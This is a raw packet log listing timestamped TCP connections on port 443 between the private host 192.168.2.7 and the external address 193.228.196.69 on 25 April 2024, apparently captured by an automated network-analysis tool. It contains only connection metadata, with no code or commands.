Apr 25, 2024 14:22:25.504189014 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.504193068 CEST	443	49750	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:25.505266905 CEST	443	49750	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:25.505434990 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.506947041 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.507066965 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:25.507091045 CEST	443	49750	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:25.507457972 CEST	49750	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.424782038 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.424818039 CEST	443	49751	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:26.424875975 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.425702095 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.425717115 CEST	443	49751	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:26.839874029 CEST	443	49751	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:26.850362062 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.850385904 CEST	443	49751	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:26.850457907 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.850465059 CEST	443	49751	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:26.851545095 CEST	443	49751	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:26.851603985 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.852232933 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.852338076 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:26.852396011 CEST	443	49751	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:26.852483988 CEST	49751	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:27.720674992 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:27.720720053 CEST	443	49752	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:27.721297979 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:27.721713066 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:27.721725941 CEST	443	49752	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:28.141757011 CEST	443	49752	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:28.141941071 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:28.141958952 CEST	443	49752	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:28.142026901 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:28.142031908 CEST	443	49752	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:28.143053055 CEST	443	49752	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:28.143269062 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:28.148514032 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:28.148556948 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:28.148658037 CEST	443	49752	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:28.148714066 CEST	49752	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.198195934 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.198242903 CEST	443	49753	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:29.199919939 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.203799009 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.203815937 CEST	443	49753	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:29.625636101 CEST	443	49753	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:29.626214027 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.626214027 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.626240015 CEST	443	49753	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:29.626260042 CEST	443	49753	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:29.627269983 CEST	443	49753	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:29.627377033 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.628143072 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.628266096 CEST	443	49753	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:29.628361940 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:29.628370047 CEST	443	49753	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:29.628462076 CEST	49753	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:30.679333925 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:30.679383993 CEST	443	49755	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:30.679460049 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:30.679893970 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:30.679904938 CEST	443	49755	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:31.100960016 CEST	443	49755	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:31.101166964 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:31.101176977 CEST	443	49755	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:31.101264954 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:31.101300001 CEST	443	49755	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:31.104839087 CEST	443	49755	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:31.105205059 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:31.107235909 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:31.107379913 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:31.107566118 CEST	443	49755	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:31.107634068 CEST	49755	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.069807053 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.069853067 CEST	443	49756	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:32.070060968 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.070852995 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.070862055 CEST	443	49756	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:32.483716011 CEST	443	49756	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:32.483839035 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.483864069 CEST	443	49756	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:32.483927011 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.483932018 CEST	443	49756	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:32.484966993 CEST	443	49756	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:32.485022068 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.485411882 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.485503912 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:32.485528946 CEST	443	49756	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:32.485573053 CEST	49756	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.446055889 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.446099997 CEST	443	49757	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:33.446393013 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.451951981 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.451998949 CEST	443	49757	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:33.876007080 CEST	443	49757	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:33.876548052 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.876570940 CEST	443	49757	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:33.876666069 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.876672029 CEST	443	49757	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:33.877700090 CEST	443	49757	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:33.877798080 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.878515959 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.878515959 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:33.878660917 CEST	443	49757	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:33.878988028 CEST	49757	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.141927958 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.141980886 CEST	443	49758	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:35.142215014 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.145908117 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.145932913 CEST	443	49758	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:35.568085909 CEST	443	49758	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:35.568550110 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.568573952 CEST	443	49758	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:35.568628073 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.568634033 CEST	443	49758	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:35.569660902 CEST	443	49758	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:35.569734097 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.570398092 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.570532084 CEST	443	49758	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:35.570560932 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:35.570566893 CEST	443	49758	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:35.570599079 CEST	49758	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:36.668740988 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:36.668859005 CEST	443	49759	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:36.668940067 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:36.670319080 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:36.670356035 CEST	443	49759	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:37.086117983 CEST	443	49759	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:37.086371899 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.086421967 CEST	443	49759	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:37.086488962 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.086502075 CEST	443	49759	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:37.090141058 CEST	443	49759	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:37.090217113 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.090653896 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.090764999 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.091917038 CEST	443	49759	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:37.091980934 CEST	49759	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.978002071 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.978045940 CEST	443	49760	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:37.981970072 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.985944986 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:37.985963106 CEST	443	49760	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:38.400913000 CEST	443	49760	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:38.401186943 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:38.401212931 CEST	443	49760	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:38.401312113 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:38.401318073 CEST	443	49760	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:38.402736902 CEST	443	49760	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:38.402796030 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:38.403503895 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:38.403634071 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:38.403664112 CEST	443	49760	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:38.403713942 CEST	49760	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.423805952 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.423880100 CEST	443	49761	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:39.428273916 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.428275108 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.428350925 CEST	443	49761	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:39.844379902 CEST	443	49761	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:39.845107079 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.845107079 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.845165014 CEST	443	49761	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:39.845211983 CEST	443	49761	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:39.846678019 CEST	443	49761	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:39.846807003 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.847512007 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.847620964 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:39.847693920 CEST	443	49761	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:39.847872972 CEST	49761	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.123800039 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.123853922 CEST	443	49762	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:41.124034882 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.127800941 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.127814054 CEST	443	49762	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:41.541153908 CEST	443	49762	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:41.541337013 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.541368961 CEST	443	49762	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:41.541409969 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.541416883 CEST	443	49762	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:41.542880058 CEST	443	49762	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:41.543030977 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.543499947 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.543499947 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:41.543674946 CEST	443	49762	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:41.543895006 CEST	49762	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:42.731911898 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:42.731954098 CEST	443	49763	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:42.732032061 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:42.732490063 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:42.732503891 CEST	443	49763	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:43.154757977 CEST	443	49763	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:43.155005932 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:43.155025005 CEST	443	49763	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:43.155114889 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:43.155121088 CEST	443	49763	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:43.158706903 CEST	443	49763	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:43.158859968 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:43.159323931 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:43.159323931 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:43.159704924 CEST	443	49763	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:43.164000988 CEST	49763	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.144996881 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.145039082 CEST	443	49764	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:44.145114899 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.145840883 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.145855904 CEST	443	49764	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:44.562172890 CEST	443	49764	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:44.562323093 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.562340021 CEST	443	49764	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:44.562614918 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.562619925 CEST	443	49764	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:44.566284895 CEST	443	49764	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:44.566351891 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.567034006 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.567135096 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:44.567399025 CEST	443	49764	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:44.567449093 CEST	49764	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.433974981 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.434004068 CEST	443	49765	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:45.434338093 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.437805891 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.437819004 CEST	443	49765	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:45.853771925 CEST	443	49765	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:45.854075909 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.854075909 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.854093075 CEST	443	49765	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:45.854105949 CEST	443	49765	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:45.857809067 CEST	443	49765	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:45.857976913 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.858536005 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.858536005 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:45.858906984 CEST	443	49765	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:45.859054089 CEST	49765	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:46.889691114 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:46.889733076 CEST	443	49766	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:46.889887094 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:46.890358925 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:46.890373945 CEST	443	49766	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:47.307212114 CEST	443	49766	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:47.310267925 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:47.310282946 CEST	443	49766	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:47.310363054 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:47.310367107 CEST	443	49766	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:47.313731909 CEST	443	49766	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:47.313883066 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:47.314358950 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:47.314358950 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:47.314527988 CEST	443	49766	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:47.318269014 CEST	49766	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.298029900 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.298069000 CEST	443	49767	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:48.298130035 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.299762964 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.299781084 CEST	443	49767	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:48.716166019 CEST	443	49767	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:48.716303110 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.716329098 CEST	443	49767	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:48.716455936 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.716461897 CEST	443	49767	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:48.719983101 CEST	443	49767	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:48.720047951 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.720477104 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.720565081 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:48.720820904 CEST	443	49767	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:48.720877886 CEST	49767	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.550265074 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.550306082 CEST	443	49768	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:49.550685883 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.551323891 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.551338911 CEST	443	49768	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:49.967356920 CEST	443	49768	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:49.967751980 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.967792034 CEST	443	49768	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:49.968000889 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.968012094 CEST	443	49768	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:49.971571922 CEST	443	49768	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:49.971718073 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.972407103 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.972572088 CEST	443	49768	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:49.972611904 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:49.972625971 CEST	443	49768	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:49.972671986 CEST	49768	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.198311090 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.198349953 CEST	443	49769	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:51.198568106 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.199788094 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.199796915 CEST	443	49769	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:51.622771025 CEST	443	49769	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:51.626115084 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.626115084 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.626127958 CEST	443	49769	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:51.626138926 CEST	443	49769	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:51.629688025 CEST	443	49769	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:51.629791021 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.630453110 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.630570889 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:51.630779982 CEST	443	49769	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:51.630894899 CEST	49769	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:52.584496975 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:52.584547043 CEST	443	49770	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:52.584625006 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:52.585530996 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:52.585557938 CEST	443	49770	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:53.010921001 CEST	443	49770	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:53.011080980 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.011110067 CEST	443	49770	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:53.011182070 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.011193991 CEST	443	49770	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:53.015189886 CEST	443	49770	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:53.015264988 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.015958071 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.016202927 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.016463995 CEST	443	49770	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:53.016529083 CEST	49770	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.774596930 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.774650097 CEST	443	49771	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:53.775101900 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.779793024 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:53.779817104 CEST	443	49771	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:54.194823027 CEST	443	49771	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:54.199779987 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:54.199845076 CEST	443	49771	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:54.200155020 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:54.200174093 CEST	443	49771	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:54.201642036 CEST	443	49771	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:54.201709986 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:54.209706068 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:54.209836960 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:54.209881067 CEST	443	49771	193.228.196.69	192.168.2.7
Apr 25, 2024 14:22:54.209944963 CEST	49771	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.194312096 CEST	49772	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:22:55.194359064 CEST	443	49772	193.228.196.69	192.168.2.7
